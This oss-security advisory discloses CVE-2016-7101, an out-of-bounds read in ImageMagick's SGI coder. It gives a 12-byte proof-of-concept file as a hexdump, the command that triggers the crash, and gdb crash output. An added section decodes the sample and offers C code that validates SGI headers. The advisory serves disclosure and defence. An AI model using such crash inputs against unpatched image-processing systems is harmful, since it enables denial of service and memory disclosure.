Date: Mon, 26 Sep 2016 07:54:24 +0000
From: pwchen(陈佩文) <pwchen@...cent.com>
To: oss-security <oss-security@...ts.openwall.com>
Subject: CVE-2016-7101 - ImageMagick SGI Coder Out-Of-Bounds Read Vulnerability

Hi.

This is Peiwen Chen of Tencent's Xuanwu Lab and Ray Zhong of Tencent's Keen Lab.
During our research, we found an out-of-bounds read vulnerability in
ImageMagick's SGI coder.

When ImageMagick identifies an SGI-format image, a crafted SGI file with a
large row value makes the reader perform a number of reads that is controlled
by that value, which causes an out-of-bounds read.

The ImageMagick team has fixed the vulnerability we reported.


Upstream fix:
https://github.com/ImageMagick/ImageMagick/commit/7afcf9f71043df15508e46f079387bd4689a738d
https://github.com/ImageMagick/ImageMagick/commit/8f8959033e4e59418d6506b345829af1f7a71127

Debian Bug report:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=836776


Attached is a proof of concept and backtrace.

$ hexdump PoC.sgi
0000000 da01 0100 0000 fffe 0200 0400
000000c

$ convert PoC.sgi


Program received signal SIGSEGV, Segmentation fault.
[------------------------registers------------------------]
RAX: 0x0
RBX: 0x1
RCX: 0xf939
RDX: 0x6031b0 --> 0x0
RSI: 0x7ffff7fe8090 --> 0x1
RDI: 0x7ffff7dcef98 --> 0x1
RBP: 0xdfbc
RSP: 0x7fffffff5e60 --> 0xffffffff54535254
RIP: 0x7ffff74eae8b (<IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4])
R8 : 0x744850 --> 0x0
R9 : 0x1
R10: 0x69a000 --> 0x0
R11: 0x1
R12: 0x641600 --> 0x600000000
R13: 0x6535f0 --> 0x1700000001
R14: 0x603178 --> 0x6031b0 --> 0x0

R15: 0x765000                          <== end address of heap

[---------------------------code---------------------------]
   0x7ffff74eae7d <IdentifyImageGray+781>: inc    BYTE PTR [rdx+rcx*1]
   0x7ffff74eae80 <IdentifyImageGray+784>: mov    DWORD PTR [rax],0x5177
   0x7ffff74eae86 <IdentifyImageGray+790>: mov    rax,QWORD PTR [rsp+0x30]
=> 0x7ffff74eae8b <IdentifyImageGray+795>: movss  xmm0,DWORD PTR [r15+rax*4]
   0x7ffff74eae91 <IdentifyImageGray+801>: movaps XMMWORD PTR [rsp+0x40],xmm0
   0x7ffff74eae96 <IdentifyImageGray+806>: mov    rax,QWORD PTR [rsp+0x28]
   0x7ffff74eae9b <IdentifyImageGray+811>: movss  xmm4,DWORD PTR [r15+rax*4]
   0x7ffff74eaea1 <IdentifyImageGray+817>: subss  xmm0,xmm4
[---------------------------stack---------------------------]
00:0000| rsp 0x7fffffff5e60 --> 0xffffffff54535254
01:0008|     0x7fffffff5e68 --> 0x0
02:0016|     0x7fffffff5e70 --> 0x63d600 --> 0x6535f0 --> 0x1700000001
03:0024|     0x7fffffff5e78 --> 0x614160 --> 0x1a9
04:0032|     0x7fffffff5e80 --> 0x0
05:0040|     0x7fffffff5e88 --> 0x1
06:0048|     0x7fffffff5e90 --> 0x0
07:0056|     0x7fffffff5e98 --> 0xfeff
[-----------------------------------------------------------]
Legend: stack, code, data, heap, rodata, value
Stopped reason: SIGSEGV
0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
561   red_green=(MagickRealType) pixel[image->channel_map[RedPixelChannel].offset]-

gdb-peda$ bt
#0  0x00007ffff74eae8b in IsPixelMonochrome (image=<optimized out>, pixel=<optimized out>) at ./MagickCore/pixel-accessor.h:561
#1  IdentifyImageGray (image=<optimized out>, exception=<optimized out>) at MagickCore/attribute.c:683
#2  0x00007ffff74ebb7a in IdentifyImageType (image=0x6535f0, exception=0x614160) at MagickCore/attribute.c:821
#3  0x00007ffff7647d39 in IdentifyImage (image=0x6535f0, file=<optimized out>, verbose=<optimized out>, exception=0x614160) at MagickCore/identify.c:494
#4  0x00007ffff71024a6 in IdentifyImageCommand (image_info=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/identify.c:336
#5  0x00007ffff7153e53 in MagickCommandGenesis (image_info=<optimized out>, command=<optimized out>, argc=<optimized out>, argv=<optimized out>, metadata=<optimized out>, exception=<optimized out>) at MagickWand/mogrify.c:183
#6  0x0000000000401cae in MagickMain (argc=<optimized out>, argv=<optimized out>) at utilities/magick.c:145
#7  main (argc=<optimized out>, argv=<optimized out>, argv@...ry=0x7fffffffeb48) at utilities/magick.c:176
#8  0x00007ffff5a3b830 in __libc_start_main (main=0x4015f0 <main>, argc=0x2, argv=0x7fffffffeb48, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffeb38) at ../csu/libc-start.c:291
#9  0x0000000000401519 in _start ()


gdb-peda$ vmmap
Start              End                Perm Name
0x00400000         0x00403000         r-xp /usr/local/bin/magick
0x00602000         0x00603000         r--p /usr/local/bin/magick
0x00603000         0x00604000         rw-p /usr/local/bin/magick
0x00604000         0x00765000         rw-p [heap]
0x00007ffff553f000 0x00007ffff5817000 r--p /usr/lib/locale/locale-archive


Regards,
Peiwen Chen
Tencent's Xuanwu Lab
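The 12-byte PoC above can be decoded by hand. Note that hexdump prints 16-bit little-endian words, so "da01" is the byte pair 01 da, the SGI magic 0x01DA. Read as big-endian fields per the public SGI image-file layout (magic, storage, bytes-per-channel, dimension, xsize, ysize, zsize), the sample declares columns = 0xfeff (the same value visible at the bottom of the stack dump), rows = 2 and depth = 4, in a file that is only 12 bytes long, far short of the 512-byte header alone. The following is an added example, not the reporters' code or ImageMagick's: it parses those fields from the hexdump bytes and rejects the file when the declared geometry is not backed by the bytes actually present, which is the check a reader must pass before any allocation or scanline loop trusts the header. The field limits (bpc 1 or 2, depth at most 4), the RLE table-size check and all helper names are this example's own choices, not the upstream fix.

```c
/* Added example (not ImageMagick's code or the reporters' PoC): decode an SGI
 * header and verify the declared geometry against the bytes present. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SGI_MAGIC      0x01DA
#define SGI_HEADER_LEN 512      /* fixed on-disk header size per the SGI spec */

struct sgi_hdr {
    uint16_t magic;
    uint8_t  storage;    /* 0 = verbatim scanlines, 1 = RLE with offset tables */
    uint8_t  bpc;        /* bytes per channel sample: 1 or 2 */
    uint16_t dimension;
    uint16_t columns;    /* xsize */
    uint16_t rows;       /* ysize */
    uint16_t depth;      /* zsize: channels per pixel */
};

enum sgi_status { SGI_OK = 0, SGI_SHORT_HEADER, SGI_BAD_MAGIC,
                  SGI_BAD_FIELD, SGI_TRUNCATED_PIXELS };

/* PoC.sgi from the report: hexdump's little-endian words turned back into
 * file byte order, 12 bytes total. */
static const uint8_t poc_sgi[12] = {
    0x01, 0xda, 0x00, 0x01, 0x00, 0x00, 0xfe, 0xff, 0x00, 0x02, 0x00, 0x04
};

static uint16_t rd16be(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static void wr16be(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }

/* Decode the fixed fields; every multi-byte field is big-endian. */
int sgi_parse_header(const uint8_t *buf, size_t len, struct sgi_hdr *h)
{
    if (len < 12) return SGI_SHORT_HEADER;
    h->magic     = rd16be(buf);
    h->storage   = buf[2];
    h->bpc       = buf[3];
    h->dimension = rd16be(buf + 4);
    h->columns   = rd16be(buf + 6);
    h->rows      = rd16be(buf + 8);
    h->depth     = rd16be(buf + 10);
    return h->magic == SGI_MAGIC ? SGI_OK : SGI_BAD_MAGIC;
}

/* Reject the file before any allocation or scanline loop runs: the header must
 * be complete, the fields plausible, and the bytes after the header must cover
 * what the geometry implies (pixel data for verbatim storage, the two
 * rows*depth uint32 start/length tables for RLE storage). */
int sgi_check(const uint8_t *buf, size_t len)
{
    struct sgi_hdr h;
    uint64_t avail, need;
    int rc = sgi_parse_header(buf, len, &h);
    if (rc != SGI_OK) return rc;
    if (len < SGI_HEADER_LEN) return SGI_SHORT_HEADER;
    if (h.storage > 1 || (h.bpc != 1 && h.bpc != 2)) return SGI_BAD_FIELD;
    if (h.columns == 0 || h.rows == 0 || h.depth == 0 || h.depth > 4) return SGI_BAD_FIELD;
    avail = (uint64_t)len - SGI_HEADER_LEN;
    if (h.storage == 0)
        need = (uint64_t)h.columns * h.rows * h.depth * h.bpc;  /* cannot overflow 64 bits */
    else
        need = (uint64_t)h.rows * h.depth * 2 * sizeof(uint32_t);
    return avail < need ? SGI_TRUNCATED_PIXELS : SGI_OK;
}

/* Write a full 512-byte header for h followed by payload_len zero bytes. */
size_t sgi_build(const struct sgi_hdr *h, size_t payload_len, uint8_t *out, size_t cap)
{
    size_t total = SGI_HEADER_LEN + payload_len;
    if (cap < total) return 0;
    memset(out, 0, total);
    wr16be(out, h->magic);
    out[2] = h->storage;
    out[3] = h->bpc;
    wr16be(out + 4, h->dimension);
    wr16be(out + 6, h->columns);
    wr16be(out + 8, h->rows);
    wr16be(out + 10, h->depth);
    return total;
}

/* Constructed inputs: 0 = the 12-byte PoC as posted, 1 = the PoC fields on a
 * full header with no pixel data, 2 = a well-formed 2x2 single-channel file. */
int sgi_sample_status(int which)
{
    static uint8_t buf[SGI_HEADER_LEN + 64];
    struct sgi_hdr h;
    size_t n;

    if (which == 0) return sgi_check(poc_sgi, sizeof poc_sgi);
    if (which == 1) {
        sgi_parse_header(poc_sgi, sizeof poc_sgi, &h);
    } else {
        memset(&h, 0, sizeof h);
        h.magic = SGI_MAGIC; h.bpc = 1; h.dimension = 2;
        h.columns = 2; h.rows = 2; h.depth = 1;
    }
    n = sgi_build(&h, which == 1 ? 0 : 4, buf, sizeof buf);  /* 2*2*1*1 = 4 bytes */
    return sgi_check(buf, n);
}

int main(void)
{
    struct sgi_hdr h;
    const char *name[] = { "PoC as posted", "PoC fields, full header", "2x2 sample" };
    sgi_parse_header(poc_sgi, sizeof poc_sgi, &h);
    printf("PoC header: storage=%u bpc=%u dim=%u columns=%u rows=%u depth=%u\n",
           (unsigned)h.storage, (unsigned)h.bpc, (unsigned)h.dimension,
           (unsigned)h.columns, (unsigned)h.rows, (unsigned)h.depth);
    for (int i = 0; i < 3; i++)
        printf("%-24s -> status %d\n", name[i], sgi_sample_status(i));
    return 0;
}
```

The posted PoC fails on the first test, because 12 bytes cannot hold a 512-byte header; padding the same fields out to a full header moves the failure to the pixel-payload check, since a verbatim image of 0xfeff x 2 x 4 samples needs over 500 KiB of data that the file does not carry. Computing the required size in 64 bits before comparing it against what is available is what keeps the geometry check itself from overflowing.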
